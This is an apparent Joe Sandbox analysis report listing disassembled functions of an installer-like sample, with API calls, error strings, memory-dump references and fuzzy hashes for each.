                                                                                                                                                                                                                                                                                                  • API String ID: 3848097054-4159625223
                                                                                                                                                                                                                                                                                                  • Opcode ID: b50ddf133130afcff2473f3d48488c00468706e94c7d991909e91a34211059a3
                                                                                                                                                                                                                                                                                                  • Instruction ID: 9eb4d9cbb9737109fa00541fbfe86ea301befa57478bddba2dfdfcff95fa5147
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b50ddf133130afcff2473f3d48488c00468706e94c7d991909e91a34211059a3
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 64F0EC3764263567962172995D06BCF7688FF05F717120135FE01F7741E625AC40CBE6
                                                                                                                                                                                                                                                                                                  Function 0087EBCB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34threadwindowCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • PostThreadMessageW.USER32(?,00009003,00000000,?), ref: 0087EBE0
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0087EBEA
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • EngineForApplication.cpp, xrefs: 0087EC0E
                                                                                                                                                                                                                                                                                                  • Failed to post apply message., xrefs: 0087EC18
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLastMessagePostThread
                                                                                                                                                                                                                                                                                                  • String ID: EngineForApplication.cpp$Failed to post apply message.
                                                                                                                                                                                                                                                                                                  • API String ID: 2609174426-1304321051
                                                                                                                                                                                                                                                                                                  • Opcode ID: d8559dfc3af3af614abb91e8dcec9929a6c314c73ea92ac278a14b64bbe715f9
                                                                                                                                                                                                                                                                                                  • Instruction ID: ccbc90567e414d82c7d9a2442bacdc80da782bad2699e7b147b1d0de167a981e
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d8559dfc3af3af614abb91e8dcec9929a6c314c73ea92ac278a14b64bbe715f9
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4FF0A737A5123567E62216999C0DE8BBE88FF09B70B028060FE28FF381E665DC0086D5
                                                                                                                                                                                                                                                                                                  Function 0087EC5C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34threadwindowCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • PostThreadMessageW.USER32(?,00009000,00000000,?), ref: 0087EC71
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0087EC7B
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to post detect message., xrefs: 0087ECA9
                                                                                                                                                                                                                                                                                                  • EngineForApplication.cpp, xrefs: 0087EC9F
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLastMessagePostThread
                                                                                                                                                                                                                                                                                                  • String ID: EngineForApplication.cpp$Failed to post detect message.
                                                                                                                                                                                                                                                                                                  • API String ID: 2609174426-598219917
                                                                                                                                                                                                                                                                                                  • Opcode ID: cd5a616e4836402d8309be0500bececaffe9332bbeef7edfcb50e116bf19de3e
                                                                                                                                                                                                                                                                                                  • Instruction ID: c0606894f4f34c3434b355caac22435dd92cae07cd60f0f0e11941756dd87ea0
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cd5a616e4836402d8309be0500bececaffe9332bbeef7edfcb50e116bf19de3e
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 76F0A737A51331A7D6315699AC09F8B7F98FF09B71B028061BE58FB381D665DC00C5D5
                                                                                                                                                                                                                                                                                                  Function 00896B76 Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1036877536-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: a43b07c52b3a46684783b2fbffe6c2b3820df8a855d7f8bf8198392ab5bcf62a
                                                                                                                                                                                                                                                                                                  • Instruction ID: 7c418b4110a5fbc617a26efba4d571dd27b4e7c28ba05adcdacf9b2d47107016
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a43b07c52b3a46684783b2fbffe6c2b3820df8a855d7f8bf8198392ab5bcf62a
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 89A15475A0038A9FEF21AF28C8817AEBBE1FF11354F2C416DE495DB282E2398D51C751
                                                                                                                                                                                                                                                                                                  Function 008A5EC5 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 163stringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrlen
                                                                                                                                                                                                                                                                                                  • String ID: dlutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 1659193697-2067379296
                                                                                                                                                                                                                                                                                                  • Opcode ID: 443e5c6e5ecc73f0ff9c3f46db717c7cbcb3293c374d28364db438e5483ab457
                                                                                                                                                                                                                                                                                                  • Instruction ID: d9c558f42f759bf39110a14b1ef34d5667d4b4633ea7364546aaa475ccab9fa8
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 443e5c6e5ecc73f0ff9c3f46db717c7cbcb3293c374d28364db438e5483ab457
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D651A172901619AFEB119FA48C809AFBBB9FF89710F1A4014FD04F7650EB35DD918BA0
                                                                                                                                                                                                                                                                                                  Function 0089922B Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,ECE85006,00892444,00000000,00000000,00893479,?,00893479,?,00000001,00892444,ECE85006,00000001,00893479,00893479), ref: 00899278
                                                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00899301
                                                                                                                                                                                                                                                                                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00899313
                                                                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 0089931C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0089521A: HeapAlloc.KERNEL32(00000000,?,?,?,00891F87,?,0000015D,?,?,?,?,008933E0,000000FF,00000000,?,?), ref: 0089524C
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide$AllocHeapStringType__freea
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 573072132-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 91e876e8cffaf8455756aa93b175103e499e542e4c17616f2d5039b3f0eae7f3
                                                                                                                                                                                                                                                                                                  • Instruction ID: a79cfaf5bbc3f6c075879fe39434e48ae6317cbd346328c3321296ade2cae74d
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 91e876e8cffaf8455756aa93b175103e499e542e4c17616f2d5039b3f0eae7f3
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 27319C32A0020AABDF25AFA8CC85DAE7BA5FB40310B180128F854D6291E735CD51DBA0
                                                                                                                                                                                                                                                                                                  Function 00864FA4 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,00000000,?,00865552,?,?,?,?,?,?), ref: 00864FFE
                                                                                                                                                                                                                                                                                                  • DeleteCriticalSection.KERNEL32(?,?,?,00000000,?,00865552,?,?,?,?,?,?), ref: 00865012
                                                                                                                                                                                                                                                                                                  • TlsFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00865552,?,?), ref: 00865101
                                                                                                                                                                                                                                                                                                  • DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00865552,?,?), ref: 00865108
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00861161: LocalFree.KERNEL32(?,?,00864FBB,?,00000000,?,00865552,?,?,?,?,?,?), ref: 0086116B
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CriticalDeleteFreeSection$CloseHandleLocal
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3671900028-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 944bf565931bd043a2d570a3642ee08c26c526e7102a1626d626cbe76fec5eb5
                                                                                                                                                                                                                                                                                                  • Instruction ID: fb52becb7816d8bdb66ef56530f0feb472cc6fbac114abb5debd15cb268d4b1e
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 944bf565931bd043a2d570a3642ee08c26c526e7102a1626d626cbe76fec5eb5
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C3410AB1500B05ABDA30EBB8C849F9B73ECFF05310F450C29B69AD3451EB34E5458B62
                                                                                                                                                                                                                                                                                                  Function 008A3245 Relevance: 6.1, APIs: 4, Instructions: 73memoryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 008A3258
                                                                                                                                                                                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 008A3264
                                                                                                                                                                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 008A32D8
                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 008A32E3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A3498: SysAllocString.OLEAUT32(?), ref: 008A34AD
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: String$AllocVariant$ClearFreeInit
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 347726874-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: e35185f4b5d86d330e27792200fcade4ca496f71f1e0fbca1e3064535f37826b
                                                                                                                                                                                                                                                                                                  • Instruction ID: 03aebb05f1e3f2548b8d7c546df956c603124fd79008f6f74256950a43d6531a
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e35185f4b5d86d330e27792200fcade4ca496f71f1e0fbca1e3064535f37826b
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 78214C35A01219AFDB14DFA4C858FAEBBB9FF4A716F104158F901EB620D7319E05CB90
                                                                                                                                                                                                                                                                                                  Function 00864C86 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 68COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0086F96C: RegCloseKey.ADVAPI32(00000000,?,?,00000001,00000000,00000000,?,?,00864CA5,?,?,00000001), ref: 0086F9BC
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,?,?,00000001,00000000,?,?,?), ref: 00864D0C
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Unable to get resume command line from the registry, xrefs: 00864CAB
                                                                                                                                                                                                                                                                                                  • Failed to get current process path., xrefs: 00864CCA
                                                                                                                                                                                                                                                                                                  • Failed to re-launch bundle process after RunOnce: %ls, xrefs: 00864CF6
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Close$Handle
                                                                                                                                                                                                                                                                                                  • String ID: Failed to get current process path.$Failed to re-launch bundle process after RunOnce: %ls$Unable to get resume command line from the registry
                                                                                                                                                                                                                                                                                                  • API String ID: 187904097-642631345
                                                                                                                                                                                                                                                                                                  • Opcode ID: 7b8841c0781de4e0bd1d429b42e8ada23317921e3779035fbafd0cd067e82c86
                                                                                                                                                                                                                                                                                                  • Instruction ID: a3d7f0b23337c449753b6ab4bfb533300189717dbb1c259e1d405f6371473f54
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7b8841c0781de4e0bd1d429b42e8ada23317921e3779035fbafd0cd067e82c86
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4F114C31D01618BBDF22AB99DC028AEBBB8FF51710B1141A6F910F6711EB318A50DB81
                                                                                                                                                                                                                                                                                                  Function 008988B2 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00898A56,00000000,00000000,?,00898859,00898A56,00000000,00000000,00000000,?,00898A56,00000006,FlsSetValue), ref: 008988E4
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00898859,00898A56,00000000,00000000,00000000,?,00898A56,00000006,FlsSetValue,008C2404,008C240C,00000000,00000364,?,00896230), ref: 008988F0
                                                                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00898859,00898A56,00000000,00000000,00000000,?,00898A56,00000006,FlsSetValue,008C2404,008C240C,00000000), ref: 008988FE
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3177248105-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 19fe51826d278c70fb29fc05c0efeabf3bb016b63ebdb72b0509fa375bbb2df2
                                                                                                                                                                                                                                                                                                  • Instruction ID: e45309f3da16dca1e6030563f6149cb9437987d064b6e564a7f3ef2a4dad6b1b
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 19fe51826d278c70fb29fc05c0efeabf3bb016b63ebdb72b0509fa375bbb2df2
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FC01F73274522BEBDF215A69AC44E6B7B98FF07BA1B180624F906E3641DF30DC0087E0
                                                                                                                                                                                                                                                                                                  Function 0089615E Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00891AEC,00000000,80004004,?,00891DF0,00000000,80004004,00000000,00000000), ref: 00896162
                                                                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,80004004,00000000,00000000), ref: 008961CA
                                                                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,80004004,00000000,00000000), ref: 008961D6
                                                                                                                                                                                                                                                                                                  • _abort.LIBCMT ref: 008961DC
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$_abort
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 88804580-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: eda4c2df64b6f964608ab2e6f9582ea9453f2f739ad263e81f7e9d0c12e59e00
                                                                                                                                                                                                                                                                                                  • Instruction ID: 75057cc6b85934545e1dd9c1b479bc1f80e549f1a84e22088eb0ed4a9ed74da8
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eda4c2df64b6f964608ab2e6f9582ea9453f2f739ad263e81f7e9d0c12e59e00
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BFF0F436100E01A6CE1233396C0AF1F36A9FBC27B1B2D0116F814D29A7FF6088124226
                                                                                                                                                                                                                                                                                                  Function 00867435 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 00867441
                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,00000000), ref: 008674A8
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to get value as numeric for variable: %ls, xrefs: 00867497
                                                                                                                                                                                                                                                                                                  • Failed to get value of variable: %ls, xrefs: 0086747B
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                                  • String ID: Failed to get value as numeric for variable: %ls$Failed to get value of variable: %ls
                                                                                                                                                                                                                                                                                                  • API String ID: 3168844106-4270472870
                                                                                                                                                                                                                                                                                                  • Opcode ID: 980022162bd07b729f0b64cfe5613ac3a4a1e65739f57def69e79d6397c4f430
                                                                                                                                                                                                                                                                                                  • Instruction ID: d72a0e54a1934d041faf6dad62022d15d4004c9a670e77f236dc8471c65abe09
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 980022162bd07b729f0b64cfe5613ac3a4a1e65739f57def69e79d6397c4f430
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5F017C32944129FBDF126F58CC09A9E7F64FF01729F128261FD04EA221CB369E509BD9
                                                                                                                                                                                                                                                                                                  Function 008675AA Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 008675B6
                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,00000000), ref: 0086761D
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to get value as version for variable: %ls, xrefs: 0086760C
                                                                                                                                                                                                                                                                                                  • Failed to get value of variable: %ls, xrefs: 008675F0
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
